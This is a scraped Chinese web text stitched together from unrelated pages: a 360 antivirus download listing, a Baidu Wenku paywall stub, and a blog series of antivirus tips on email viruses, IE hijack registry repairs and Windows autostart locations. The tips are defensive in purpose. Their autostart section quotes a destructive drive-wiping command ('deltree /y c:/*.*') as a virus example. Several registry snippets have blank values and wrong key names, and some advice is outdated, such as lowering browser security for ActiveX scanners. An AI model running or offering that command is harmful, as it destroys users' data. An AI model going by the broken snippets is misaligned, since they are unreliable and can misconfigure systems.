当前位置：
360杀毒 官方正式版v5.1.9
更新时间：
软件大小：34.58MB
软件类型：国产软件
软件语言：简体
软件授权：免费软件
软件分类：
支持系统：
&&360杀毒是奇虎360出品的一款免费的云安全杀毒软件。360杀毒整合了五大领先查杀引擎，包括国际知名的BitDefender病毒查杀引擎、小红伞病毒查杀引擎、360云查杀引擎、360主动防御引擎以及360第二代QVM人工智能引擎，为用户带来安全、专业、有效、新颖的查杀防护体验。
360杀毒软件使用界面
德国著名杀毒软件
体积小、云查杀
　　360杀毒高查杀率、低资源占用率、升级迅速。无广告干扰，，一键扫描，快速、全面地诊断系统安全，精准修复。其防杀病毒能力得到多个国际权威安全软件评测机构认可，荣获多项国际权威认证。
　　360杀毒是完全免费的杀毒软件，360杀毒整合了四大领先防杀引擎，包括国际知名的BitDefender病毒查杀、 云查杀、主动防御、360QVM人工智能等四个引擎，不但查杀能力出色，而且能第一时间防御新出现的病毒木马。此外，360杀毒轻巧快速不卡机，误杀率远远低于其它杀软。
　　1、快速扫描：短时间内迅速检测电脑的健康和安全信息，给出电脑的安全与否的相关数据，并根据电脑的情况给出适合的建议。
　　2、实时防护：区分防护等级，分为基本防护,中度防护和严格防护。分等级维护，满足不同用户的需求。
　　3、超强广告拦截。软件弹窗?浏览器弹窗?网页广告?超强广告拦截?帮您通通搞定!无广告干扰，一直坚持只做杀毒!
　　360杀毒软件怎么拦截广告弹窗?
　　很多网友都非常反感一些网站突然弹出来的弹窗广告，有一些广告内容还会令人感到不适。
　　1、打开360杀毒后，在360杀毒的主页右下角点击&弹窗拦截&。
　　2、在&360弹窗拦截器&里点击&强力拦截&。&强力拦截&模式拦截效果更好。
　　3、点击&手动添加&按钮，选择需要拦截广告的软件，点击该选项后边的&开启拦截&即可拦截广告，如果是拦截过然后又忽略掉的后边是&恢复拦截&。
　　1、双击下载后的安装包，打开安装向导，可以选择更改目录，选择相应的盘进行安装，如果不选择，默认选择C盘，点击立即安装
　　2、安装完成后打开360杀毒界面
　　1、针对常用的一些功能进行设置
　　2、点击全盘扫描，对系统进行全面扫描，给出相应的问题，和针对性的解决方法
　　3、针对系统，设置系统安全、系统优化和系统急救三个方面，对系统的一些常见问题进行整理
360软件专题专题
360杀毒专题
杀毒软件排行榜2专题
电脑常用软件专题
360杀毒下载地址
Windows版下载
360杀毒相关版本
厂商其他下载
官方最新版v11.6
官方正式版v5.1.9
绿色免费版v5.1.64.1206
官方免费版v180502
官方版v1.3
官方免费版v5.0.0.5104
v5.0.1.5105B
官方最新版v12.8.6.0
下载之家是国内最值得信赖的官方软件下载资源提供商，提供安全无毒的绿色软件下载、手机软件下载、游戏下载等。高速安全的软件下载尽在下载之家！
Copyright &
下载之家 (http://www.downza.cn). All Rights Reserved.手机自动下载病毒软件怎么办_百度文库
您的浏览器Javascript被禁用，需开启后体验完整功能，
享专业文档下载特权
&赠共享文档下载特权
&10W篇文档免费专享
&每天抽奖多种福利
两大类热门资源免费畅读
续费一年阅读会员，立省24元！
手机自动下载病毒软件怎么办
阅读已结束，下载本文需要
想免费下载本文？
定制HR最喜欢的简历
下载文档到电脑，同时保存到云知识，更方便管理
加入VIP
还剩5页未读，
定制HR最喜欢的简历
你可能喜欢主站：http://blog.sina.com.cn/orchidmirror
常见病毒查杀与防御技巧(from:http://www.ccoo.cn/blog/blogshow.asp?aid=184498)
有人认为杀毒是一件简单的事情，不就是点击杀毒软件的“杀毒”按钮就行了吗？
　　 不错，杀毒的确要借助杀毒软件，但是不是说一点击杀毒就万事大吉的。这就是为什么有的人一次性就将病毒杀尽，有的人机子内的病毒永远也杀不完的原因了。杀毒也要讲技巧！
　　 对于杀毒的设置本文就不做介绍了。
　　 杀毒要讲环境。其实说真的，杀毒最好的环境就是用干净引导盘启动的DOS。但是如果每次出现病毒都到DOS下杀是不科学的！即费时间，有减少DOS杀毒盘的寿命。那么，该怎么判断该在什么环境下杀毒呢？
　　一、被激活的非系统文件内的病毒
　　 杀这种病毒很简单，只需要在一般的Windows环境下杀就行了。一般都能将其歼灭。
　　二、已经被激活或发作的非系统文件内的病毒
　　 如果在一般Windows环境下杀毒，效果可能会大打折扣。虽然，现在的反病毒软件都能查杀内存病毒，但是此技术毕竟还未成熟，不一定能歼灭病毒。
　　 因此，杀此类病毒应在Windows安全模式下进行。在Windows安全模式下，这些病毒都不会在启动时被激活。因此，我们就能放心的杀毒了。
　　三、系统文件内病毒
　　 这类病毒比较难缠，所以在操作前请先备份。杀此类病毒一定要在干净的DOS环境下进行。有时候还要反复查杀才能彻底清除。
　　四、网络病毒（特别是通过局域网传播的病毒）
　　 此类病毒必须在断网的情况下才能清除，而且清除后很容易重新被感染！要根除此类病毒必需靠网络管理员的努力了！
　　五、感染杀毒厂家有提供专用杀毒工具的病毒
　　 杀灭此类病毒好办，只需下载免费的专用杀毒工具就行了。专用杀毒工具杀毒精确性相对较高，因此我推荐在条件许可的情况下使用专用杀毒工具。
杀毒很讲究技巧，所以，选择适合自己的反病毒软件和时刻开启监控很重要，还有千万别忘了升级哦！
杀毒技巧系列－－坚决把 “邮件病毒” 消灭
邮件病毒”其实和普通的电脑病毒一样，只不过由于它们的传播途径主要是通过电子邮件，所以才被称为“邮件病毒”，它们一般是通过邮件中“附件”夹带的方法进行扩散。现在就告诉大家把“邮件病毒”消灭在邮箱之中应用八招。
　　1、选择一款正版的防毒软件。借杀毒软件中的邮件监视功能，在邮件接收过程中对其进行病毒扫描过滤
　　2、及时升级病毒库。病毒软件厂商天天都会更新病毒库，提供的升级服务是非常周到，如果用户不及时升级，就很难对新病毒进行查杀。
3、打开实时监控防火墙。防火墙最重要的功能就是邮件监视功能。
4、不要轻易打开陌生人的邮件附件，如果发现邮件中无内容，无附件，邮件自身的大小又有几十K或者更大，那么此邮件中极有可能包含有病毒；如果附件为可执行文件（.exe、.com）或word文档时，要选择用杀毒软件的扫描查毒察看；如果发现收到的邮件对方地址非常陌生，域名对极不像正常的国内邮箱，那就很有可能是收到病毒了；如果是双后缀那么极有可能是病毒，因为邮件病毒会选择隐藏在附件中，直接册除即可。
5、尽量不在“地址薄”中设置联系名单。因为一但被病毒感染，病毒会通过邮件“地址薄”中的联系人来传播。
6、少使用信纸模块。信纸模块都是一些脚本文件，如果模块感染了脚本病毒例如VBS/KJ、欢乐时光等，那用户使用信纸发出去的邮件都带有病毒了。
7、设置邮箱自动过滤功能。这样不仅能够防止垃圾邮件，还可以过滤掉一些带病毒邮件。
8、不使用邮件软件邮箱中的HTML预览功能。当今，一些传播与破坏力比较大的病毒，往往都是通过邮件预览时进行感染，并不需要打开邮件。
杀毒技巧系列--计算机防毒杀毒的六大常见误区
计算机防毒杀毒的六大常见误区
　　误区1：有了杀毒软件我就可以什么毒都不怕
　　真的有了杀毒软件就什么毒也不怕吗？答案肯定不行的，
　　病毒是不断有新的出现的，而且它的出现往往无法预料，杀毒软件也要不断更新，要不断升级才能对付新出现的病毒，即使这样，有很多时候杀毒软件升级到最新也不能杀掉全部的病毒，升级到最新，只是能让您的电脑拒绝更多的病毒，让您的电脑处于更安全的状态，并不意味着您就可以忽略电脑安全，平时还是要注意共享安全；不要下载不明程序，不要打开不明网页等等。
　　误区2：装杀毒软件越多越好
　　前两天，笔者帮朋友装机，朋友不懂电脑，所以对我说：“装多几个杀毒软件吧，我怕上网很多毒。”晕倒?￥%?#……，真的装杀毒软件越多越好吗？其实不同厂商开发的杀毒软件很容易引起冲突。不少杀毒厂商为了避免这种情况的发生，在安装的时候就检测电脑中是否安装有其他杀毒软件，目的就是为了避免两个杀毒软件同时使用的时候出现的冲突。而且，对于大部分的病毒，一般一个杀毒软件都可以杀掉，对付特殊病毒也有不少专杀工具。装的杀毒软件越多，除了可能出现冲突以外，还会消耗更多的系统资源，减慢电脑运行速度。装多几个杀毒软件，得益却没什么，失去效能就可能很大。所以，并不是杀毒软件越多越好。
　　误区3：杀毒软件能杀毒就行了
　　杀毒软件能杀毒就行？是不是等到病毒入侵然后才来杀毒？有些人 b了杀毒软件，想减小系统资源的消耗，会把杀毒软件关掉，当病毒入侵时候才用杀毒软件来杀毒。这种意识是不行的，现在病毒风行，可以无孔不入，一不小心，您就会很容易“中毒”，况且现在硬盘之大，令很多杀毒软件杀毒时间都很长；而且假如病毒入侵的时候才杀毒，那么可能您的系统早已崩溃，数据早已丢失，为时已晚，到时候损失就大了。因此，杀毒不是重点，防才是最重要。与其说是杀毒软件，不如说是防毒软件更好！
　　误区4：只要我不上网就不会有病毒
　　有些人的电脑连接到因特网，以为只要不打开网页上网就不会感染病毒，所以想不打开杀毒软件防毒。其实，虽然不少病毒是通过网页传播的，但是也有不少病毒不等您打开网页早已入侵您的机器，这个是必须防范的。冲击波，蠕虫病毒等等都会在您不知不觉中进入电脑。而且，盗版的光盘，软盘也会存在病毒。因此，只要您的电脑开着，最好就防着！
　　误区5：文件设置只读就可以避免病毒
　　设置只读，只是调用系统几个命令而已，而病毒也可以调用系统命令。因此，可以病毒可以改掉文件属性，严重的可以删掉重要文件，格式化硬盘，让系统崩溃！因此，设置只读，并不能有效防毒，不过对于局域网中为了共享安全，防止误删除，设置只读属性还是比较有用的。
　　误区6：病毒不感染数据文件
　　有人觉得，病毒是一段程序，而数据文件如.txt、.pcx等格式文件一般不会包含程序，因此不会感染病毒。殊不知像word、excel等数据文件由于包含了可执行码却会被病毒感染，而且，有些病毒可以让硬盘里面的文件全部格式化掉，因此，我们不能忽视数据文件的备份。
　　上面只介绍了常见的防毒杀毒误区，还有一些其它的误区，在我们使用电脑的时候都可能慢慢碰到的。在我们使用电脑的时候，最重要还是防毒，而能做好防毒，那就需要不断更新您的杀毒软件，同时注意打上系统地升级补丁。
对付计算机病毒的酷招秘技
1.一个好，两个妙
　　无论是菜鸟还是飞鸟，杀毒软件和网络防火墙都是必需的。上网前或启动机器后马上运行这些软件，就好像给你的机器“穿”上了一层厚厚的“保护衣”，就算不能完全杜绝网络病毒的袭击，起码也能把大部分的网络病毒“拒之门外”。目前杀毒软件非常多，功能也十分接近，大家可以根据需要去购买正版的(都不算贵)，也可以在网上下载免费的共享杀毒软件(网上有不少哦)，但千万不要使用一些破解的杀毒软件，以免因小失大。安装软件后，要坚持定期更新病毒库和杀毒程序，以最大限度地发挥出软件应有的功效，给计算机“铁桶”般的保护。
　　2.下载文件仔细查
　　网络病毒之所以得以泛滥，很大程度上跟人们的惰性和侥幸心理有关。当你下载文件后，最好立即用杀毒软件扫描一遍，不要怕麻烦，尤其是对于一些Flash、MP3、文本文件同样不能掉以轻心，因为现在已经有病毒可以藏身在这些容易被大家忽视的文件中了。
　　3.拒绝不良诱惑
　　很多中了网页病毒的朋友，都是因为访问不良站点惹的祸，因此，不去浏览这类网页会让你省心不少。另外，当你在论坛、聊天室等地方看到有推荐浏览某个URL时，要千万小心，以免不幸“遇害”，或者尝试使用以下步骤加以防范：
　　1)打开杀毒软件和网络防火墙；
　　2)把Internet选项的安全级别设为“高”；
　　3)尽量使用以IE为内核的浏览器(如MyIE2)，然后在MyIE2中新建一个空白标签，并关闭Script、javaApple、ActiveX功能后再输入URL。
　　小提示：该方法不但能有效对付网页病毒，而且对“蠕虫病毒”也有一定作用。
4.免费午餐：在线查毒
　　虽然目前网络上的“免费午餐”越来越少，但仍有一些网站坚持向网民们提供免费的在线查毒服务，实在是值得表扬哦。对于没有安装查毒软件、又担心会“中招”的朋友，可以利用在线查毒服务为自己的“爱姬”来一个全身“扫描”：
　　千禧在线：
　　趋势科技：＿corp.htm
　　武汉热线：tech.wuhan.net.cn/scan/
　　瑞星在线：online.rising.com.cn/
　　263在线查毒：gz.263.com/zxsd.htm
　　McAfee在线杀毒：
　　小提示：1)各网站的在线查毒服务都有所不同，使用前要仔细阅读网站上的相关说明后再进行操作，争取把病毒赶尽杀绝；
　　2)由于查毒时需要调用浏览器的ActiveX控件，因此查毒前要先在IE的“Internet选项”＼“安全”页面中检查该功能是否打开，并相应降低安全级别(一般“中等”即可)再查毒。
　　5.千呼万唤终不应
　　如果你发现有“你中奖啦！”、“打开附件会有意外惊喜哦！”这些话，可千万别信！看到类似广告的邮件标题，最好马上把它删掉。对于形迹可疑的邮件(特别是HTML格式)，不要随便打开，如果是你熟悉的朋友发来的，可以先与对方核实后再作处理。同时，也有必要采取一定措施来预防邮件病毒：
　　1)尽量不要用Outlook作为你的邮件客户端，改以Foxmail等代替，同时以文本方式书写和阅读邮件，这样就不用担心潜伏在HTML中的病毒了；
　　2)多使用远程邮箱功能，利用远程邮箱的预览功能(查看邮件Header和部分正文)，可以及时找出垃圾邮件和可疑邮件，从而把病毒邮件直接从服务器上赶走；
　　3)不要在Web邮箱中直接阅读可疑邮件，因为这种阅读方法与浏览网页的原理一样，需要执行一些脚本或Applet才能显示信息，有一定危险性。
　6.修修补补，填充漏洞
　　当前各种各样的安全漏洞给网络病毒开了方便之门(其中以IE和PHP脚本语言的漏洞最多)，我们平时除了注意及时对系统软件和网络软件进行必要升级外，还要尽快为各种漏洞打上最新的补丁。其中一个检测漏洞的简易方法就是直接使用系统中自带的“Windows Update”功能，让微软为你的电脑来一次“全身检查”并打上安全补丁。当然也可以使用其他软件对计算机进行安全检测(例如东方卫士的“系统漏洞检测精灵”就是一个不错的软件)，以便及早发现漏洞。
　　7.给危险文件加把“锁”
　　不管网络病毒如何“神通广大”，它要对计算机进行破坏，总是要调用系统文件的执行程序(例如format.exe、delete.exe、deltree.exe等)，根据这个特点，我们可以对这些危险文件采用改名、更改后缀、更换存放目录、用软件进行加密保护等多种方法进行防范，让病毒无从下手。
　　8.有“备”无患，打造最后防线
　　正所谓“智者千虑，必有一失”，为保证计算机内重要数据的安全，定时备份少不了。如果我们能做好备份工作，即使遭受网络病毒的全面破坏，也能把损失减至最小。当然，前提条件是必须保证备份前数据没被感染病毒，否则只能是徒劳无功。另外，要尽量把备份文件刻录到光盘上或存放到隐藏分区中，以免“全军覆没”。
　　二、见招拆招——杀毒软件的常见问题
　　安装杀毒软件后与其他软件发生冲突怎么办？
　　1)由于多数杀毒软件和防火墙在默认设置中都是开机后自动运行的，因此当发生软件冲突时先检查是否开启了杀毒软件和防火墙，然后尝试暂时关闭杀毒软件和防火墙的监测功能，再看看问题是否已经解决；
　　2)到杀毒软件的主页网站看看是否出了相关补丁或升级版本，有则打上补丁或升级到最新版本；
　　3)如果以上措施还不能解决问题，可以通过E-mail联系作者，寻求解决方法。
不能正常升级怎么办？
　　1)如果使用的是正版软件，可以先试着完全卸载旧版本，再安装新版本(为安全起见，建议卸载前先进行备份)；
　　2)检查是否安装了多种杀毒软件，卸载其他杀毒软件后再安装；
　　3)检查输入的序列号是否正确、钥匙盘(A盘)有没有损坏，有问题的请与经销商联系解决；
　　4)尝试以下操作方法：清空Temp文件夹→关闭打开的杀毒软件→换路径重新安装→把安装光盘中的安装目录拷贝到硬盘上，然后运行目录里的“Setup.exe”。
　无法清除病毒怎么办？
　　1)先升级病毒库再杀毒；
　　2)用一张干净的系统引导盘启动机器后，在DOS状态下进行杀毒；
　　3)备份染毒文件并隔离，然后把病毒样本寄给作者，得到新病毒库后再杀毒。
　　三、亡羊补牢——病毒发作后的急救措施
　　虽然已经做足了防范措施，但正所谓：“天有不测之风云”，万一中招了，我们还有什么急救措施呢？
　　1.软件方面
　　1)首先断开全部网络连接，以免病毒向其他在线电脑传播，然后马上用杀毒软件进行扫描杀毒工作(记得要先扫描内存、引导区)；
　　2)赶快备份和转移重要文档到安全地方(软盘、光盘)，记录账号、密码等资料，等病毒清除完毕后再作处理；
　　3)平时曾用GHOST备份的，可以利用映像文件来恢复系统，这样不但能马上恢复工作，而且连同所有病毒也一并清除了，当然，这要求你的GHOST备份是没有感染病毒的。另外，恢复系统前同样要先做好备份重要资料的工作。
　　4)没有进行GHOST备份，并且机器中数据并不重要的，可以用干净的引导盘启动机器后格式化硬盘，然后再重新安装系统和程序。
　　2.硬件方面
　　1)BIOS或CMOS被破坏的，需要找寻相同类型的主板，然后用热插拔的方法进行恢复。此方法存在着极大的危险性，最好找专业技术人员代你进行恢复。
　　2)硬盘引导区或主引导扇区被破坏的，可以尝试用KV杀毒王、金山毒霸等硬盘修复工具进行修复。
　　做好了上面这些防范和应对措施，网络病毒再也别想骚扰到你，冲浪当然更安全了！
杀毒技巧系列－－恶意网页病毒十三种症状分析及简单修复方法
恶意网页病毒十三种症状分析及简单修复方法
一、对IE浏览器产生破坏的网页病毒：
　　（一）.默认主页被修改
　　1.破坏特性：默认主页被自动改为某网站的网址。
　　2.表现形式：浏览器的默认主页被自动设为如********.COM的网址。
　　3.清除方法：采用手动修改注册表法，开始菜单－&运行－&regedit-&确定，打开注册表编辑工具，按顺序依次打开：HKEY_LOCAL_USER/Software/Microsoft/Internet Explorer/Main　分支，找到Default_Page_URL键值名(用来设置默认主页)，在右窗口点击右键进行修改即可。按F5键刷新生效。
　　危害程度：一般
（二）.默认首页被修改
　　1.破坏特性：默认首页被自动改为某网站的网址。
　　2.表现形式：浏览器的默认主页被自动设为如********.COM的网址。
　　3.清除方法：采用手动修改注册表法，开始菜单－&运行－&regedit-&确定，打开注册表编辑工具，按如下顺序依次打开：HKEY_LOCAL_USER/Software/Microsoft/Internet Explorer/Main分支，找到StartPage键值名(用来设置默认首页)，在右窗口点击右键进行修改即可。按F5键刷新生效。
　　危害程度：一般
　　（三）.默认的微软主页被修改
　　1.破坏特性：默认微软主页被自动改为某网站的网址。
　　2.表现形式：默认微软主页被篡改。
　　3.清除方法：
　　(1)手动修改注册表法：开始菜单－&运行－&regedit-&确定，打开注册表编辑工具，按如下顺序依次打开：HKEY_LOCAL_MACHINE/Software/Microsoft/InternetExplorer/Main　分支，找到Default_Page_URL键值名(用来设置默认微软主页)，在右窗口点击右键，将键值修改为
即可。按F5键刷新生效。
　　(2)自动文件导入注册表法：请把以下内容输入或粘贴复制到记事本内，以扩展名为reg的任意文件名存在C盘的任一目录下，然后执行此文件，根据提示，一路确认，即可显示成功导入注册表。
　　REGEDIT4
　　[HKEY_LOCAL_MACHINE/Software/Microsoft/Internet Explorer/Main]
　　"default_page_url"=""
　　危害程度：一般
　　（四）.主页设置被屏蔽锁定，且设置选项无效不可更改
　　1.破坏特性：主页设置被禁用。
　　2.表现形式：主页地址栏变灰色被屏蔽。
　　3.清除方法：(1)手动修改注册表法：开始菜单－&运行－&regedit-&确定，打开注册表编辑工具，按如下顺序依次打开：HKEY_CURRENT_USER/Software/Microsoft/InternetExplorer/分支，新建“ControlPanel”主键，然后在此主键下新建键值名为“HomePage”的DWORD值，值为“”，按F5键刷新生效。
　　(2)自动文件导入注册表法：请把以下内容输入或粘贴复制到记事本内，以扩展名为reg的任意文件名存在C盘的任一目录下，然后执行此文件，根据提示，一路确认，即可显示成功导入注册表。
　　REGEDIT4
　　[HKEY_CURRENT_USER/Software/Policies/Microsoft/Internet Explorer/Control Panel]
　　"HomePage"=dword:
　　危害程度：轻度
　　（五）.默认的IE搜索引擎被修改
　　1.破坏特性：将IE的默认微软搜索引擎更改。
　　2.表现形式：搜索引擎被篡改。
　　3.清除方法：(1)手动修改注册表法：开始菜单－&运行－&regedit-&确定，打开注册表编辑工具，第一，按如下顺序依次打开：HKEY_LOCAL_MACHINE/Software/Microsoft/Internet Explorer/Search分支，找到“SearchAssistant”键值名，在右面窗口点击“修改”，即可对其键值进行输入为：
，然后再找到“CustomizeSearch”键值名，将其键值修改为：
，按F5键刷新生效。
　　(2)自动文件导入注册表法：请把以下内容输入或粘贴复制到记事本内，以扩展名为reg的任意文件名存在C盘的任一目录下，然后执行此文件，根据提示，一路确认，即可显示成功导入注册表。
　　REGEDIT4
　　[HKEY_LOCAL_MACHINE/Software/Microsoft/InternetExplorer/Search]
　　"SearchAssistant"=""
　　"CustomizeSearch"=""
　　危害程度：一般
　　（六）.IE标题栏被添加非法信息
　　1.破坏特性：通过修改注册表，使IE标题栏被强行添加宣传网站的广告信息。
　　2.表现形式：在IE顶端蓝色标题栏上多出了一些不知名网站信息。
　　3.清除方法：(1)手动修改注册表法：开始菜单－&运行－&regedit-&确定，打开注册表编辑工具，第一，按如下顺序依次打开：HKEY_CURRENT_USER/Software/Microsoft/Internet Explorer/Main分支，找到“Window Title”键值名，输入键值为Microsoft Internet Explorer，按F5刷新。
　　第二，按如下顺序依次打开：HKEY_CURRENT_MACHINE/Software/Microsoft/InternetExplorer/Main分支，找到“Window Title”键值名，输入键值为Microsoft Internet Explorer，按F5刷新生效。
　　(2)自动文件导入注册表法：请把以下内容输入或粘贴复制到记事本内，以扩展名为reg的任意文件名存在C盘的任一目录下，然后执行此文件，根据提示，一路确认，即可显示成功导入注册表。
　　REGEDIT4
　　[HKEY_CURRENT_USER/Software/Microsoft/Internet Explorer/Main]
　　"Window Title"="Microsoft Internet Explorer"
　　[HKEY_LOCAL_MACHINE/Software/Microsoft/Internet Explorer/Main]
　　"Window Title"="Microsoft Internet Explorer"
　　危害程度：一般
　　（七）.OE标题栏被添加非法信息破坏特性：
　　破坏特性：通过修改注册表，在微软的集成电子邮件程序Microsoft Outlook顶端标题栏添加宣传网站的广告信息br]
　　表现形式：在顶端的Outlook Express蓝色标题栏添加非法信息。
　　清除方法：(1)手动修改注册表法：开始菜单－&运行－&regedit-&确定，打开注册表编辑工具，按如下顺序依次打开：HKEY_LOCAL_USER/Software/Microsoft/Outlook Express分支，找到WindowTitle以及Store Root键值名，将其键值均设为空。按F5键刷新生效。
　　(2)自动文件导入注册表法：请把以下内容输入或粘贴复制到记事本内，以扩展名为reg的任意文件名存在C盘的任一目录下，然后执行此文件，根据提示，一路确认，即可显示成功导入注册表。
　　REGEDIT4
　　[HKEY_CURRENT_USER/Software/Microsoft/Outlook Express]
　　"WindowTitle"=""
　　"Store Root"=""
　　危害程度：一般
　　（八）.鼠标右键菜单被添加非法网站链接：
　　1.破坏特性：通过修改注册表，在鼠标右键弹出菜单里被添加非法站点的链接。
　　2.表现形式：添加“网址之家”等诸如此类的链接信息。
　　3.清除方法：(1)手动修改注册表法：开始菜单－&运行－&regedit-&确定，打开注册表编辑工具，按如下顺序依次打开：HKEY_CURRENT_USER/Software/Policies/Microsoft/Internet Explorer/MenuExt分支，在左边窗口凡是属于非法链接的主键一律删除，按F5键刷新生效。
　　4.危害程度：一般
　　（九）.鼠标右键弹出菜单功能被禁用失常：
　　1.破坏特性：通过修改注册表，鼠标右键弹出菜单功能在IE浏览器中被完全禁止。
　　2.表现形式：在IE中点击右键毫无反应。
　　3.清除方法：(1)手动修改注册表法：开始菜单－&运行－&regedit-&确定，打开注册表编辑工具，按如下顺序依次打开：HKEY_CURRENT_USER/Software/Policies/Microsoft/Internet Explorer/Restrictions分支，找到“NoBrowserContextMenu”键值名，将其键值设为“”，按F5键刷新生效。
　　(2)自动文件导入注册表法：请把以下内容输入或粘贴复制到记事本内，以扩展名为reg的任意文件名存在C盘的任一目录下，然后执行此文件，根据提示，一路确认，即可显示成功导入注册表。
　　REGEDIT4
　　[HKEY_CURRENT_USER/Software/Policies/Microsoft/Internet Explorer/Restrictions]
　　"NoBrowserContextMenu"=dword:
　　危害程度：轻度
　　（十）.IE收藏夹被强行添加非法网站的地址链接
　　破坏特性：通过修改注册表，强行在IE收藏夹内自动添加非法网站的链接信息。
　　表现形式：躲藏在收藏夹下。
　　清除方法：请用手动直接清除，用鼠标右键移动至该非法网站信息上，点击右键弹出菜单，选择删除即可。
　　危害程度：一般
　　（十一）.在IE工具栏非法添加按钮
　　破坏特性：工具栏处添加非法按钮。
　　表现形式：有按钮图标。
　　清除方法：直接点击鼠标右键弹出菜单，选择“删除”即可。
　　危害程度：一般
　　（十二）.锁定地址栏的下拉菜单及其添加文字信息
　　破坏特性：通过修改注册表，将地址栏的下拉菜单锁定变为灰色。
　　表现形式：不仅使下拉菜单消失，而且在其上覆盖非法文字信息。
　　清除方法：(1)手动修改注册表法：开始菜单－&运行－&regedit-&确定，打开注册表编辑工具，按如下顺序依次打开：HKEY_CURRENT_USER/Software/Policies/Microsoft/Internet Explorer/Toolbar分支，在右边窗口找到“LinksFolderName”键值名，将其键值设为“链接”，多余的字符一律去掉，按F5键刷新生效。
　　危害程度：轻度
　　（十三）.IE菜单“查看”下的“源文件”项被禁用
　　破坏特性：通过修改注册表，将IE菜单“查看”下的“源文件”项锁定变为灰色。
　　表现形式：“源文件”项不可用。
　　清除方法：(1)手动修改注册表法：开始菜单－&运行－&regedit-&确定，打开注册表编辑工具，第一，按如下顺序依次打开：HKEY_CURRENT_USER/Software/Policies/Microsoft/Internet Explorer/Restrictions分支，找到"NoViewSource"键值名，将其键值设为“”，按F5键刷新生效。
　　按如下顺序依次打开：HKEY_LOCAL_MACHINE/Software/Policies/Microsoft/Internet Explorer/Restrictions分支，找到"NoViewSource"键值名，将其键值设为“”，按F5键刷新生效。
　　(2)自动文件导入注册表法：请把以下内容输入或粘贴复制到记事本内，以扩展名为reg的任意文件名存在C盘的任一目录下，然后执行此文件，根据提示，一路确认，即可显示成功导入注册表。
　　REGEDIT4
　　[HKEY_CURRENT_USER/Software/Policies/Microsoft/Internet Explorer/Restrictions]
　　"NoViewSource"=dword:
　　[HKEY_LOCAL_MACHINE/Software/Policies/Microsoft/Internet Explorer/Restrictions]
　　"NoViewSource"=dword:
　　危害程度：轻度
如何查杀自启动程序
一、经典的启动——“启动”文件夹
　　单击“开始→程序”，你会发现一个“启动”菜单，这就是最经典的Windows启动位置，右击“启动”菜单选择“打开”即可将其打开，如所示，其中的程序和快捷方式都会在系统启动时自动运行。最常见的启动位置如下：
　　当前用户：&C:/Documents and Settings/用户名/「开始」菜单/程序/启动&
　　所有用户：&C:/Documents and Settings/All Users/「开始」菜单/程序/启动&
二、有名的启动——注册表启动项
　　注册表是启动程序藏身之处最多的地方，主要有以下几项：
　　1.Run键
　　Run键是病毒最青睐的自启动之所，该键位置是[HKEY_CURRENT_
USER/Software/Microsoft/Windows/CurrentVersion/Run]和[HKEY_
LOCAL_MACHINE/Software/Microsoft/Windows/CurrentVersion/Run]，其下的所有程序在每次启动登录时都会按顺序自动执行。
　　还有一个不被注意的Run键，位于注册表[HKEY_CURRENT_
USER/Software/Microsoft/Windows/CurrentVersion/Policies/Explorer/Run]和[HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Windows/CurrentVersion/
Policies/Explorer/Run]，也要仔细查看。
　　2.RunOnce键
　　RunOnce位于[HKEY_CURRENT_USER/Software/Microsoft/Windows/
CurrentVersion/RunOnce]和[HKEY_LOCAL_MACHINE/Software/Microsoft/
Windows/CurrentVersion/RunOnce]键，与Run不同的是，RunOnce下的程序仅会被自动执行一次。
　　3.RunServicesOnce键
　　RunServicesOnce键位于[HKEY_CURRENT_USER/Software/Microsoft/
Windows/CurrentVersion/RunServicesOnce]和[HKEY_LOCAL_MACHINE/
Software/Microsoft/Windows/CurrentVersion/RunServicesOnce]下，其中的程序会在系统加载时自动启动执行一次。
　　4.RunServices键
　　RunServices继RunServicesOnce之后启动的程序，位于注册表[HKEY_CURRENT_USER/Software/Microsoft/Windows/CurrentVersion/RunServices]和[HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Windows/CurrentVersion/
RunServices]键。
　　5.RunOnceEx键
　　该键是Windows XP/2003特有的自启动注册表项，位于[HKEY_
CURRENT_USER//SOFTWARE/Microsoft/Windows/CurrentVersion/RunOnceEx]和[HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Windows/CurrentVersion/RunOnceEx]。
　　6.load键
　　[HKEY_CURRENT_USER/Software/Microsoft/WindowsNT/CurrentVersion/Windows]下的load键值的程序也可以自启动。
　　7.Winlogon键
　　该键位于位于注册表[HKEY_CURRENT_USER/SOFTWARE/
Microsoft/Windows NT/CurrentVersion/Winlogon]和[HKEY_LOCAL_MACHINE/
SOFTWARE/Microsoft/Windows NT/CurrentVersion/Winlogon]，注意下面的Notify、Userinit、Shell键值也会有自启动的程序，而且其键值可以用逗号分隔，从而实现登录的时候启动多个程序。
　　8.其他注册表位置
　　还有一些其他键值，经常会有一些程序在这里自动运行，如：[HKEY_CURRENT_USER/Software/Microsoft/Windows/CurrentVersion/Policies/System/Shell]
[HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Windows/CurrentVersion/ShellServiceObjectDelayLoad]
[HKEY_CURRENT_USER/Software/Policies/Microsoft/Windows/System/Scripts]
[HKEY_LOCAL_MACHINE/Software/Policies/Microsoft/Windows/System/Scripts]
　　小提示
　　注册表的[HKEY_LOCAL_MACHINE]和[HKEY_CURRENT_USER]键的区别：前者对所有用户有效，后者只对当前用户有效。
　　三、古老的启动——自动批处理文件
　　从DOS时代过来的朋友肯定知道autoexec.bat（位于系统盘根目录）这个自动批处理文件，它会在电脑启动时自动运行，早期许多病毒就看中了它，使用deltree、format等危险命令来破坏硬盘数据。如“C盘杀手”就是用一句“deltree /y c:/*.*”命令，让电脑一启动就自动删除C盘所有文件，害人无数。
　　小提示
　　★在Windows 98中，Autoexec.bat还有一个哥们——Winstart.bat文件，winstart.bat位于Windows文件夹，也会在启动时自动执行。
　　★在Windows Me/2000/XP中，上述两个批处理文件默认都不会被执行。
　　四、常用的启动——系统配置文件
　　在Windows的配置文件（包括Win.ini、System.ini和wininit.ini文件）也会加载一些自动运行的程序。
　　1.Win.ini文件
　　使用“记事本”打开Win.ini文件，在[windows]段下的“Run=”和“LOAD=”语句后面就可以直接加可执行程序，只要程序名称及路径写在“＝”后面即可。
　　小提示
　　“load=”后面的程序在自启动后最小化运行，而“run=”后程序则会正常运行。
　　2.System.ini文件
